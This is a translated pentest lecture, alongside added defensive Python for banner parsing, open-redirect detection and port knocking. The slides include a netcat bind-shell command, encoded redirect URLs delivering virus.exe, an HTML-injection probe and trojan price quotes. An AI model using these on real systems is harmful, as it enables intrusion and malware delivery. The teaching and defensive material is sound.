Pentest conisli07
Cleber Brandão
About me
Linux user for 7 years; Linux classes at Faculdades Radial; degree in Network Management; support and classes for the Projeto Telecentros SP; member of ISSA-Brasil; performance and security testing
BRconnection®
Topics
Intrusion techniques
Defining a target
Gathering information
Useful tools
Phishing
Steganography
Defense techniques
Firewall + IDS
HIDS
Honeypots
Antispam
Intrusion techniques
Social engineering, brute force, espionage, security through obscurity
Defining a target
Where to look for information?
myspace
orkut
google groups
Specific searches
Using Google's advanced operators such as Intitle, Inurl and Intext can bring you very interesting results.
Social engineering
Adam and Eve: the first victims of social engineering
Only two things in the world are infinite: the universe and human stupidity.
(Albert Einstein)
Useful tools
google, dig, nmap, nessus, Metasploit, telnet
sendip, john the ripper, host, hping3, netcat
dig
A tool similar to nslookup but more flexible; it can be used to query records such as A, TXT, MX and NS.
dig +qr google.com any
;; ANSWER SECTION:
google.com. 10186 IN MX 10 smtp2.google.com.
google.com. 10186 IN MX 10 smtp3.google.com.
google.com. 10186 IN MX 10 smtp4.google.com.
google.com. 10186 IN MX 10 smtp1.google.com.
google.com. 318637 IN NS ns1.google.com.
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:
smtp1.google.com. 2986 IN A 72.14.203.25
smtp2.google.com. 2986 IN A 64.233.167.25
smtp3.google.com. 2986 IN A 64.233.183.25
smtp4.google.com. 2986 IN A 72.14.215.25
ns1.google.com. 345220 IN A 216.239.32.10
ns2.google.com. 345220 IN A 216.239.34.10
ns3.google.com. 345219 IN A 216.239.36.10
ns4.google.com. 345219 IN A 216.239.38.10
Port scan
Nmap
is the best-known port scanner in existence today (www.insecure.org/nmap). It is an excellent tool, widely used by hackers to discover flaws in a system through unnecessarily open ports.
Nessus
Nessus is an auditing tool widely used to detect and fix vulnerabilities on the PCs of a local network, but it is also widely used by hackers to discover a target's vulnerabilities.
Reports
Nessus Scan Report
SUMMARY
- Number of hosts which were alive during the test : 1
- Number of security holes found : 1
- Number of security warnings found : 1
- Number of security notes found : 15
Reports
DETAILS
. List of open ports :
o smtp (25/tcp) (Security notes found)
o ssh (22/tcp) (Security notes found)
o ftp (21/tcp) (Security notes found)
Reports
Information found on port smtp (25/tcp)
An SMTP server is running on this port
Here is its banner :
220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
2007 09:35:31 -0300; (No UCE/UBE) logging access from:
localhost(OK)-localhost [127.0.0.1]
. Information found on port smtp (25/tcp)
Remote SMTP server banner :
220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
2007 09:35:57 -0300; (No UCE/UBE) logging access from:
localhost(OK)-localhost [127.0.0.1]
This is probably: Sendmail version 8.14.1
Reports
. Information found on port ssh (22/tcp)
An ssh server is running on this port
. Information found on port ssh (22/tcp)
Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
Remote SSH supported authentication : publickey,password
Remote SSH banner :
CleBeer's |_b note.
Reports
Metasploit
is an environment used to write, test and run exploit code. It was developed to provide penetration testing on computers and related subjects, as well as vulnerability research.
Metasploit
Command line
Web interface
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br 80
Trying 200.189.171.181...
Connected to www.alvo.com.br.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.alvo.com.br
Result
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://www.alvo.com.br/index.htm
Date: Thu, 01 Nov 2007 13:26:39 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
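The Nessus report and the telnet session above show how much a plain service banner reveals. As an added example (not code from the presentation), here are small parsers for the three banners reproduced on the slides, so a defender can list exactly which fields (hostname, version, distribution package) each of their own services discloses to any client; the HTTP status line and the `disclosed()` helper are assumptions of this example.

```python
import re
from typing import Optional

# Constructed sample input: the banners reproduced on the slides (Nessus report and telnet session).
SMTP_BANNER = ("220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 "
               "09:35:31 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]")
SSH_BANNER = "SSH-2.0-OpenSSH_4.6p1 Debian-5build1"
HTTP_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nX-Powered-By: ASP.NET\r\n"
                 "Date: Thu, 01 Nov 2007 13:26:39 GMT\r\nContent-Type: text/html\r\n\r\n")

# hostname, MTA name, first version number, optional trailing package string, then ";"
SMTP_RE = re.compile(r"^220 (\S+) E?SMTP (\S+) ([\d.]+)(?:/[\d.]+)*(?:/(\S+?))?;")
# RFC 4253 identification string: SSH-<proto>-<software>_<version> [comment]
SSH_RE = re.compile(r"^SSH-(\d\.\d+)-(\w+?)_(\S+)(?:\s+(.*))?$")


def parse_smtp_banner(line: str) -> Optional[dict]:
    """Sendmail-style 220 greeting: hostname, MTA, version and the distro package name."""
    m = SMTP_RE.match(line)
    if not m:
        return None
    return {"hostname": m[1], "software": m[2], "version": m[3], "package": m[4]}


def parse_ssh_banner(line: str) -> Optional[dict]:
    """SSH identification string: protocol, software, version and optional comment."""
    m = SSH_RE.match(line.strip())
    if not m:
        return None
    return {"protocol": m[1], "software": m[2], "version": m[3], "comment": m[4]}


def parse_http_headers(raw: str) -> dict:
    """Headers that identify the server stack (Server, X-Powered-By)."""
    headers = {}
    for line in raw.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"server": headers.get("server"), "powered_by": headers.get("x-powered-by")}


def disclosed(info: dict) -> list:
    """Fields beyond the bare software name that the banner gives away to any client."""
    return sorted(k for k, v in info.items() if v and k != "software")


if __name__ == "__main__":
    for name, info in (("smtp", parse_smtp_banner(SMTP_BANNER)),
                       ("ssh", parse_ssh_banner(SSH_BANNER)),
                       ("http", parse_http_headers(HTTP_RESPONSE))):
        print(name, info, "discloses:", disclosed(info))
```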
John the Ripper
A program used to crack passwords, supported on the UNIX, DOS and WinNT/Win95 platforms. It is a freely available program developed to crack MD5 and DES passwords based on the crypt function.
Use strong passwords?
It is not always the solution
hping3
Another tool capable of sending custom TCP, UDP and ICMP packets and receiving replies, as it does with ICMP. With it you can send encapsulated files, and it is useful for DoS attacks.
netcat
A very well-known network consulting program, owing to the fact that it is a very versatile tool: it can serve as a simple telnet client, a port scanner or even a sniffer.
Trojan
nc -l -e /bin/bash -p 1033
Port 1033 is put into listening mode and the data output is redirected to a shell (/bin/bash). Thus, whoever connects to that port has full control over the computer.
Sniffer
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
Phishing
What is phishing?
Phishing is a type of fraud designed to steal your identity. In a phishing scam, a malicious person tries to obtain information such as credit card numbers, passwords, account data or other personal information by convincing you to provide it under false pretenses.
Examples
Some well-known sites that allow this kind of fake:
yahoo
terra
http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Yahoo
http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=129lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Terra search engine
http://buscador.terra.com.br/Redirector.aspx?bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=sponsored&partner=google&query=nike&position=1&target=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Destination???
In the 3 previous URLs the request would be forwarded to:
clebeer.no-ip.org/virus.exe
Adding...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
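The three redirector URLs above all hide the same destination behind percent-encoding, and the `&tipo=` parameter carries markup straight into the page. As an added example (not code from the presentation), the block below decodes the destination of each redirector URL from the slides, flags it as an open redirect when the destination leaves the redirector's own domain, and lists query parameters whose decoded value contains HTML. The parameter-name list, the tiny public-suffix stand-in and the same-site contrast URL are assumptions of this example.

```python
from urllib.parse import urlsplit, parse_qs, unquote
from typing import Optional

# Sample input: the three redirector URLs from the slides, plus one constructed same-site redirect.
GOOGLE = ("http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5"
          "&adurl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65")
YAHOO = ("http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=129lovkbd/EXP=1188434124/"
         "**%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65")
TERRA = ("http://buscador.terra.com.br/Redirector.aspx?bstat=terrastats01&type=CK&source=buscador.terra.com.br"
         "&id=sponsored&partner=google&query=nike&position=1"
         "&target=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65")
INTERNAL = "http://www.google.com/url?url=http%3A%2F%2Fmail.google.com%2F"  # constructed, same site

# Parameter names redirectors commonly use for the destination (assumption; extend as needed).
REDIRECT_PARAMS = ("adurl", "target", "url", "redirect", "dest")
# Minimal stand-in for the Public Suffix List (assumption): enough for the hosts on this page.
SECOND_LEVEL_SUFFIXES = {"com.br", "net.br", "org.br", "co.uk"}


def redirect_target(url: str) -> Optional[str]:
    """Return the percent-decoded destination a redirector URL forwards to, or None."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs already percent-decodes
    for key in REDIRECT_PARAMS:
        if key in qs:
            return qs[key][0]
    if "/**" in parts.path:  # Yahoo-style: destination follows "/**" in the path, still encoded
        return unquote(parts.path.split("/**", 1)[1])
    return None


def registrable_domain(host: str) -> str:
    labels = host.lower().split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_open_redirect(url: str) -> bool:
    """True when the redirector forwards to a host outside its own registrable domain."""
    target = redirect_target(url)
    if target is None:
        return False
    if "://" not in target:  # "clebeer.no-ip.org/virus.exe" has no scheme: treat it as http://
        target = "http://" + target
    dest = urlsplit(target).hostname or ""
    return registrable_domain(dest) != registrable_domain(urlsplit(url).hostname or "")


def html_injecting_params(url: str) -> list:
    """Query parameters whose decoded value carries markup, like the &tipo=<img ...> probe."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [k for k, vals in qs.items() if any("<" in v or ">" in v for v in vals)]


if __name__ == "__main__":
    for u in (GOOGLE, YAHOO, TERRA, INTERNAL):
        print(urlsplit(u).hostname, "->", redirect_target(u), "open redirect:", is_open_redirect(u))
```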
Steganography
Steganography is basically a technique for hiding one file inside another file, which can be an image, a Word document or even an Excel spreadsheet, etc., but in an encrypted form.
jp(hide and seek)
jphide and jpseek are programs used to hide messages in JPEG files.
origem.jpg
destino.jpg
msg.txt
Hello, this message is secret
and only people who have the password can see it
password: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
Usage
Hide a message:
jphide origem.jpg destino.jpg mensagem.txt
Reveal a message:
jpseek destino.jpg texto-secreto.txt
How much is it worth?
Trojan (shell) - US$350.00 - US$700.00
Trojan (password theft) - US$600.00
E-mail list (32 million) - US$1,500.00
Millions of ICQ users - US$150.00
Protection against trojan detection - US$20.00
Support
Defense techniques
Firewall, (N/H/W/K)IDS, Honeypots, Antispam
Firewall
Port knocking, a lightweight and easy-to-configure solution, allows specific ports to be opened only when desired, through connection attempts on specific ports.
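The decision logic behind port knocking, as an added example (not code from the presentation or from any knocking daemon): a per-source state machine that reads firewall log lines for connection attempts to the knock ports and grants access only when the agreed sequence arrives in the right order within a time window. The knock sequence, the window and the iptables-style log lines are constructed assumptions; a real daemon would add the firewall rule where this code only records the grant.

```python
import re

# Assumptions (not from the slides): the agreed knock sequence and the time window to complete it.
KNOCK_SEQUENCE = (7000, 8000, 9000)
KNOCK_WINDOW = 10.0  # seconds from the first knock to the last

# Constructed sample: iptables LOG lines for SYNs to the knock ports, with an epoch timestamp in
# front. 10.0.0.5 knocks correctly, 10.0.0.9 uses the wrong order, 10.0.0.7 is too slow.
SAMPLE_LOG = """\
1193913600 KNOCK: SRC=10.0.0.5 DPT=7000
1193913601 KNOCK: SRC=10.0.0.5 DPT=8000
1193913602 KNOCK: SRC=10.0.0.5 DPT=9000
1193913603 KNOCK: SRC=10.0.0.9 DPT=7000
1193913604 KNOCK: SRC=10.0.0.9 DPT=9000
1193913605 KNOCK: SRC=10.0.0.9 DPT=8000
1193913606 KNOCK: SRC=10.0.0.7 DPT=7000
1193913620 KNOCK: SRC=10.0.0.7 DPT=8000
1193913621 KNOCK: SRC=10.0.0.7 DPT=9000
"""
LINE_RE = re.compile(r"^(\d+) KNOCK: SRC=(\S+) DPT=(\d+)")


class KnockTracker:
    """Per-source state machine: a correct, in-order, in-time sequence grants access."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW):
        self.sequence = tuple(sequence)
        self.window = window
        self.progress = {}  # src -> (index of the next expected knock, time of the first knock)
        self.granted = []   # (src, time) pairs for which the protected port would be opened

    def knock(self, src, port, ts):
        idx, started = self.progress.get(src, (0, ts))
        if idx and ts - started > self.window:  # sequence expired: forget partial progress
            idx = 0
        if port == self.sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
        else:  # any wrong port resets; a knock on the first port may begin a new attempt at once
            idx, started = (1, ts) if port == self.sequence[0] else (0, ts)
        if idx == len(self.sequence):
            self.granted.append((src, ts))  # a real daemon would add the firewall rule here
            idx = 0
        self.progress[src] = (idx, started)
        return idx


def process_log(text, tracker=None):
    """Feed log lines to the tracker and return the sources that completed the sequence."""
    tracker = tracker or KnockTracker()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            tracker.knock(m[2], int(m[3]), float(m[1]))
    return [src for src, _ in tracker.granted]
```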
*IDS
NIDS - Network Intrusion Detection System
HIDS - Host-based Intrusion Detection System
WIDS - Wireless Intrusion Detection System
KIDS - Kernel Intrusion Detection System
Honeypot
Useful for surveillance and for alerting on the most common types of attack, but it must be used with care so that the intruder does not gain access to the real network.
Antispam
Indispensable for any MX; useful to block forged e-mails and mail from untrusted domains. It can be enhanced with RBL and CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart") options.
Conclusion
With the popularity of free software (SL), information has become more accessible, which has contributed to greater advances in intrusion techniques; on the other hand, security systems are becoming more stable every day.
Credits
www.google.com www.brc.com.br naopod.com.br spookerlabs.multiply.com http://cartilha.cert.br/malware/
Questions
THANK YOU!